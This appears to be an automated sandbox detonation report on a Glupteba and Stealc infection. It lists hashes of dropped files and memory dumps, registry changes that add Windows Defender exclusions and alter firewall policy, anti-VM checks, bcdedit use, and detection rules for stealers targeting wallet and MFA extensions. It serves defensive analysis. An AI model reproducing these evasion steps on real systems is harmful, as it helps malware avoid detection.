C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe
| MD5 | 73a9966f578d06bade81ad2e0d82410c |
| SHA1 | 8beafd22492a021fac1ac44a29c369304a4da234 |
| SHA256 | b00c0ac4e02a7adee4f83c4d9dab20a29c0650cdbd94d6bd15bc1d0868451bcb |
| SHA512 | 7bc07f528f328000effa94a11c78acd161c9f649371d912b5753ead282ee714e3ce3b8934dfdb634a6c4e9f9461aaf12de9aac062db8096cd9458c51a7cc9bc2 |
C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe
| MD5 | fd30ded3742e62595d6570d66c40a4c1 |
| SHA1 | 1bbb7ce60aec796ef6f1e079b31a6963f22cba21 |
| SHA256 | c8c575046653ad0a424f4f8c3fb5ae1e233492a9de44928984f4e391ad3ae17b |
| SHA512 | c1b83ef70cac12fce94e6ef3d54e683a57b22bc61a220e30c7bd95fd2ebbf75b9936c3036056752e939fc60da2fffbf0d20bee99aca66cf19990612985dbe078 |
memory/4940-448-0x0000000000400000-0x0000000000930000-memory.dmp
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
memory/3548-484-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3180-485-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3700-500-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3636-502-0x0000000000400000-0x000000000063B000-memory.dmp
memory/2636-505-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\opera_package
| MD5 | 76c7a0520803d8b5f8498a680cc7f6e9 |
| SHA1 | 8d25f6bcee148c9f63cea17e1c3dcc61c08165bc |
| SHA256 | f5bf542621626f7edee65802297ce1980c8f30077407195d441fef652e9ca57c |
| SHA512 | efa80db2af34d26e3f0a2f240318b0ead55de62752ab159e5aa6564b3e5fc5b5ad962cc64d1a3114df22489532c80c45695e927dd3b75ecce899580f3a58eb31 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | c95ef39d446922ef0fd5c5f5b5aaf81a |
| SHA1 | cfa96e525ed7f60df9d69a51dfa70650c88db064 |
| SHA256 | 2bc19b096e7a293065165fdcf9594d4ccbe59197657441c770747a7b5cbaa5c8 |
| SHA512 | 216ed2ec1c580bb2c647ca840c8697cf76331aaa96f674715ad549c1e4792c4f1c5b28bd78b797ee6d750062211956f7fa4716292782cbf7f641c19979bbb343 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | ebee262873e48b451557892bb599e5ed |
| SHA1 | 89df3fc2700cc4120fd21eb67242a60c9df83899 |
| SHA256 | 2fe2ca0b47c2f9ea6c0d98b6e8412eeaa3c4a9299b386cbf47dea32cd933a5dd |
| SHA512 | 12ca1e09efefcc3c45ee81efcd897d4e0e64501ab58878baa59ba808205ef04c1492762d4ecd72d8e6a20e761a0660699e1b05df84209c7f247a095cb17cd29b |
memory/4656-589-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe
| MD5 | ac22d13853c212b42c69d60e110c9d15 |
| SHA1 | 2eda972f7ded2eb8bdcd34a4d9ddb1303ecc6b0d |
| SHA256 | 541bfa0155182c64a22d833e91e4532d8f3a2a2b288216dfd5b76340ae7e4b99 |
| SHA512 | 8bbfa0f1e9764fb3f116a8f844bce73a83a4ce1c1e187b42c033459edc2db829b798e090ddd092d60aae6c8ff05907594905c11f23e684bc4cf7e063e87bc995 |
C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe
| MD5 | 78655ded12b7e820228bf97ca82f8c8d |
| SHA1 | c8ca0273c3766f8e33aa42d1f148973086e0ba35 |
| SHA256 | 8dea5bf824fc5717161131296bd477144cafb2fca8920e05d9c67c48a34f5221 |
| SHA512 | b19d75ac5b3eadbe158d64b5d2d6fc17d24d0043ca0784d9f5e5a031df0203ee6b4bf32ffebf975dac101a73cd1c3e9079ab25c42d66f558b2cb26d01890f1e1 |
memory/4452-620-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC052.tmp\Install.exe
| MD5 | cfeca63a79c7dc19ac09534eecc44e1b |
| SHA1 | 121c4aa1dd6eaf5e200274c6b259337a8540e6a1 |
| SHA256 | f83efaf05cf22e4e5eb417db33e2c00423a2b7807af5439f136ffdf16cb6c3a3 |
| SHA512 | 9ba26eb801c4031505999c1a7ca074e71ba9f534050de82d4250973a598ca0888c83b6d0d6aa73e84ca0bd2804a6bb6dff603a4973225cb907dfb819338eeaa1 |
C:\Users\Admin\AppData\Local\Temp\7zSC052.tmp\Install.exe
| MD5 | 9745f15b1ccda65431f798011b425fd2 |
| SHA1 | 8c4bdf8ccb4a705a44fe527f33e12b3bb77d0bd3 |
| SHA256 | 258c80812964abd0d22a1155986aead1642119ed81c0f5651b153264fa3a026c |
| SHA512 | f1c2bb899261955f59ea79725ff93a87269aea3acbb3c876908b6651cbe059cebef511b10e003479b17737da0cc0ebf98008b9a6fcaefce7ef76bb98477489ae |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\additional_file0.tmp
| MD5 | 5e134d772073b5ac5113d0b4ae31c0f6 |
| SHA1 | 6040526963f03ba01153a9aefaa6a1a5b0c18703 |
| SHA256 | 124866911e021e913521d8d72d41fffc2ae94012f962d930bd347fd56d5a763f |
| SHA512 | 55b81f9f9de89be2c650abf31f418c57bb5e1e1e898168dd80a25ca2ea9ecbbe0677652037e953c6ce227227893ce9ab4666dfab36016ff56774219f79f99008 |
C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe
| MD5 | 920c89e0442e21cf4c2f0d41f64edc6f |
| SHA1 | d26d574b9d3c4cba2b3d3c373a28dfb6a0fd0b41 |
| SHA256 | 95a27cde42a451f381eeadda982df467aa6248c51e94f9db97baae33c981cc14 |
| SHA512 | 3a3db6dfffd84664feffa5d400232fd192428a41b905f8440c43eb011930dc12a64ebd85d2661c0d79c07befa7143c43c6791d444dfbbdd17a2ca22e5bb0cdab |
C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe
| MD5 | 7d44c7fb1a0c82a73260ac3bf6a69f56 |
| SHA1 | ed0a08ba5549df4b3b4728f97ee9b8b97f5c8f82 |
| SHA256 | d410e97651b37660c9334ac7aa7a9328c467cc9a7f4236aae5947c49212480cb |
| SHA512 | 93e382bde26c704d38de86a390e427717e52e1496972c2bbbb05359950de6c987a256581872f557a707215a66f65ca1dd88392df2c3fa9eba1ec0fc22bb55b4f |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
| MD5 | 15f1ac80584efd91a1d07f3cc32036c7 |
| SHA1 | fb073862ad0f2964312f4eb3cb861bd99661b9e2 |
| SHA256 | befe3e4a093b77c47036770d6f32aeab6ad6db5c06ffa8544c6be9bb4789aee6 |
| SHA512 | 88b8a04fe9b6876f71bc2ebe5797f275a2e77666634115a628484a684dbf98cb40e4256656f5d85a0843ffa431b0e1b49f9fdb99c46f754bcd4bb8d6b006271c |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
| MD5 | 3f32bcd03970abf1bf87a9367df6e6a6 |
| SHA1 | bf4819355b3444883883014dd6a908309d367c09 |
| SHA256 | 6714337224a71f3d254e6cfb2774613af27c5ca5e029cb25b055ad4b972a5f20 |
| SHA512 | d1192c5a96bcca8ab1643c12e8a8b635f919f8eed1e5fb294693ce1d6163ad8cac525b48744acfacc121ad50bb5f2ff0487f3653a6021dca3ac71a066faabd61 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbgcore.dll
| MD5 | 8b6f64e5d3a608b434079e50a1277913 |
| SHA1 | 03f431fabf1c99a48b449099455c1575893d9f32 |
| SHA256 | 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2 |
| SHA512 | c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
| MD5 | 8fa2408d910be9dce6f9858022150406 |
| SHA1 | 03dc0edc485333c3717cd58bae04098a583cf736 |
| SHA256 | 098230832f445dfefd5c5a3e5265e14dc1b8256463956dcf663119f2f684be9b |
| SHA512 | 3f4360560921dd0a9b40c720593a09bc896381bd90c2c42f16c5117d27d03dca1b113d4089707d6e2fed93c4cec65bed24dcbae838399fd24957b6da95230359 |
memory/1276-698-0x0000000010000000-0x00000000105E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
| MD5 | 6c6af30fc8c72df4054836835cdcc2b9 |
| SHA1 | a4178dde02ba2fe7200394363f8295e30cbe7f0e |
| SHA256 | e59b794d2a8a95ce735116ff5c7ab7c490ef25bdac66bbe0325da015183cf4d4 |
| SHA512 | 37384582b8cf545bb7f1304fcc9abddc12b21aff6f5ec36163bee7c485a4ae585f64589cef7e07a397d3f04e491497a119ea5fbce71aeeb22b92093fae886a67 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
| MD5 | 14f3dacbc42e9fa889a042c94dfbaf6b |
| SHA1 | cb00b215ed3ca23d61bd365c5a3fa80d0d64dc23 |
| SHA256 | 6aea23c8b5474adcc0051455b11ef1dc71fe40e8fc3f427936107d7091281f56 |
| SHA512 | b80799c3eb6f40d93b8633484421e8d2f3cf36a9656730db955d4c398374278a2b7fe146b6018c76137fc1174a2df617adf52083de157dd997b122ced4434198 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
| MD5 | 925ea07f594d3fce3f73ede370d92ef7 |
| SHA1 | f67ea921368c288a9d3728158c3f80213d89d7c2 |
| SHA256 | 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9 |
| SHA512 | a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
| MD5 | 86aae03168dc5769d0bb2a6c678c3f9f |
| SHA1 | b303ea8334145c03ef9449dcc13fff7e5ad7e23e |
| SHA256 | 2de5ddb62d5f1a1ae0a3873365cda0dd391f1b9560c2759d7c349b0a22dca907 |
| SHA512 | 0ca8e79ec66c8141f3690e0a7d1554f0be8cbbafec12c5ed85a5b95cfed5288ec79affbca044a5c097354a233067a495dd6758e98fda0f573fd57f8c3c171515 |
C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe
| MD5 | fe380780b5c35bd6d54541791151c2be |
| SHA1 | 7fe3a583cf91474c733f85cebf3c857682e269e1 |
| SHA256 | b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53 |
| SHA512 | ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c |
memory/3636-715-0x0000000000400000-0x000000000063B000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 80d3b08f8b3b5b368c12f3a5b02b62c0 |
| SHA1 | 61cf15ecb26b148e3dca3e00915cef3856465ea5 |
| SHA256 | 40d5d8f773a0e2db2dec43884242aa0dd9fbb52d5ca02513e69f6818f3911073 |
| SHA512 | 01dea22b76ccf21331a7a69b4a10c7ea825563ef09a5473ee2a8d20506f7eaf1491fba7ef8710054cef9e1e30c39460fac143951ed97eecee4065a5c54ac7b58 |
memory/2636-781-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e1365d3249b1c880978c5c80054fb5ee |
| SHA1 | b43c7fc4d450fab0f10a949900a915e409d3fde9 |
| SHA256 | d437dff5a78b4539fd5734e508d8e71055e55047248c3486af134773a9ef7d85 |
| SHA512 | efa3bc1f990b27ee641b16cc143129473786acc5201b006a441b8902802c4833036d548ea1af58f50220a36f3982e26037f9cddb2e628314ca1d97a0ccb425da |
C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe
| MD5 | 0f111be013a482e0ccf44ebba5f4a916 |
| SHA1 | dd36dde631de362b62fc16dda303d4d7b9b0e9a7 |
| SHA256 | 4dff3db1960417d7d3a4c668523899df2f2d3f7560725e9d17eceeaa707e8f1d |
| SHA512 | eb2f3f959dd942f7db50a7e6f535ad04a0ec9d5ac30d6c77642fb7879076a721f67b2f7dfd118c53a5bdf1335bd22125064c103f06a0a0c129360c5caffac1a9 |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 02cee518ef7a6090e03aef118f7e3214 |
| SHA1 | 3c2cc060c629f4cf97b13df0ff4491ec858d2667 |
| SHA256 | 7881f16a0d87799fa09d71c25346aff7f10517b44858ac14521a9c62e43a9b4e |
| SHA512 | ade7cdf54a3869069d9f5c74976ab470733924b34f2946996fdb9db843d188ba2490dbd25becc7c6b324dc7acc6f96fd980e5d47027890c1d6a0161306b5cac5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\prefs.js
| MD5 | f71925823078c6e61ccbf92c65516186 |
| SHA1 | c3403bd7858ec535855305f2fd0d4d0607a827b7 |
| SHA256 | b063a62a0f8beb00d9518b3c5b591d754c2bcd4f5e99aecc9f560d172ba90091 |
| SHA512 | 1b7b0b3c0aa0933b3fa40fa95b51c902169dfaf3667dd94bf081cad0325fa13ce8b18cd354cac6e1102137d55ade970d10c65a2f0720a414f8261beddb8219f5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 5be4bcea71a53e213d346a603bd3bfac |
| SHA1 | 4f103d1fa1ca9bfa82a08f9128b05db8cd52b1c6 |
| SHA256 | d597731b02d59bda87c7196999dde832494e03e1488396387399a0ca911f9bc7 |
| SHA512 | 2dd0234289d76a6e313b170f89dc40d7989623d4da742898018cbf8fbce946feec2209465e8cd985d56f729490bcc978e17078f6f0b22af14526114e77bee56c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 85a0f93ea503b31a86f73a9e18338a8f |
| SHA1 | c90e0392dbef35d28360f2f6775523a2a601b73c |
| SHA256 | 44904d113f31e65946b3df2901348b9a3844e4ef347dd66d63fc68141da48115 |
| SHA512 | 6ee3e40cbda78b721ec2c39c8d81edcec60ecc2f6ad238b4e5501f6b4f3fb0f01e0cc00b4444677d7c6db0c7bf4e20098e80ef563b62cdea9bded6bfe93d6013 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 03e015f325b17e6fd9c389f7d87442af |
| SHA1 | a51d6cf13a9a06c17e0ad6eb12f50c6d2b467244 |
| SHA256 | b63bc97c5a9e854c8e8baa68eaebda2a5c3f5fff3c328c5ea486e2444af9c013 |
| SHA512 | 4ca72e6c8e0ea391aabd14f4bd76f771e9230ed390226ecd96649f65d21bc263a03731f90136ead2173e0568a927899c83b58a1dfc92cce54877aefde2900129 |
C:\Users\Admin\AppData\Local\Temp\7zSC052.tmp\__data__\config.txt
| MD5 | 1148b375036c5a094b0d25842adc6fae |
| SHA1 | f8f531ea1fbdec43e078f4d0c02edb7b6d21125b |
| SHA256 | f0a7339abbc424ff0311937c5c8b3cb7ed9cf4dba3d291f0c2c04830edb4e793 |
| SHA512 | 19ea815cdea57f90763d52c5c26651fc288ca6a6ac71eadec5572626a17a6617d1bbeccc5c2e8c8d60baff08f8ab315dee1234cc0da5bd289f49f5277897381b |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-28 02:19
Reported
2024-03-28 02:21
Platform
win7-20240221-en
Max time kernel
148s
Max time network
146s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
Stealc
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\XaSfgFUxnhzcT2cWMqIx13Hz.exe = "0" | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\CBSnoej4iNufmT6hyzvcTZte.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\A6jYsiO1FW5u5LjazQ6CsBo4.exe = "0" | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
Detect binaries embedding considerable number of MFA browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables (downlaoders) containing URLs to raw contents of a paste
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables Discord URL observed in first stage droppers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing URLs to raw contents of a Github gist
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing artifacts associated with disabling Widnows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with Themida
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many varying, potentially fake Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
UPX dump on OEP (original entry point)
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
